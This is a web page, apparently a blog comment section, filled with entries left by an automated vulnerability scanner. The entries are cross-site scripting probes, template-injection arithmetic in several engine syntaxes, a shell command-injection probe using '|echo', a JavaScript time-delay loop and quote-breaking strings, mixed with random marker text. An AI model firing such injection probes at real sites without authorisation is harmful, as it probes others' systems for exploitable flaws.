  2851. ia1rddocument.title=1bun39


  2852. y5fiudocument.title=1f8n9m


  2853. y5fiudocument.title=1f8n9m


  2854. y5fiu%3cScRiPt%3edocument%2etitle%3d1%3c%2fScRiPt%3ef8n9m


  2855. y5fiudocument.title=1f8n9m


  2858. clgkx%3ca%20b%3dc%3eh3za7


  2860. duisr${285*281}umndk


  2861. wkw7v{{994*307}}q4l5m


  2862. leaw2#{643*256}argul


  2863. sq2kz[[833*683]]mrmbc


  2864. svdnq${file.separator}zdq75


  2865. u8eti%{972*300}k7dum


  2866. p0l4q{{952|add:594}}ff7dc


  2867. #set ($a=123*425) oigvy${a}zlq1c


  2868. p7jdrk0nch


  2869. saivb
    = 591*296


  2870. g8ygb{{.}}qthd1{{..}}lvsa8


  2871. tfsjn__${998*631}__q0x3v


  2872. }}w7h9i’/”<gew9s


  2873. %}okupp’/”<t1m0g


  2874. pl7tc%>jbli5’/”<pv3zj


  2875. r3rqbe8kckm6vtpfzxd3


  2876. ljxpccb2qg%411iene5gcgp


  2877. ieq7sumrm6\\lza70j1uh3


  2878. m4ztba6j9rAjpk83duf5s


  2879. m4ztba6j9rAjpk83duf5s


  2880. |echo wryqqgoesk gyjsh8hvoq||a #’ |echo wryqqgoesk gyjsh8hvoq||a #|” |echo wryqqgoesk gyjsh8hvoq||a #


  2881. ]]>><


  2882. ‘+(function(){if(typeof tyx1r===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);tyx1r=1;}}())+'


  2883. “–>’–>`–>


  2884. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2885. ztlw6t16`z’z”${{%{{\


  2886. urk15v1l64\z`z’z”${{%{{\


  2887. nvkur701


  2888. lpe3jn55z3ghq39b0qmln0w5ww2pqfe76vyio6d

Leave a Reply

Your email address will not be published. Required fields are marked *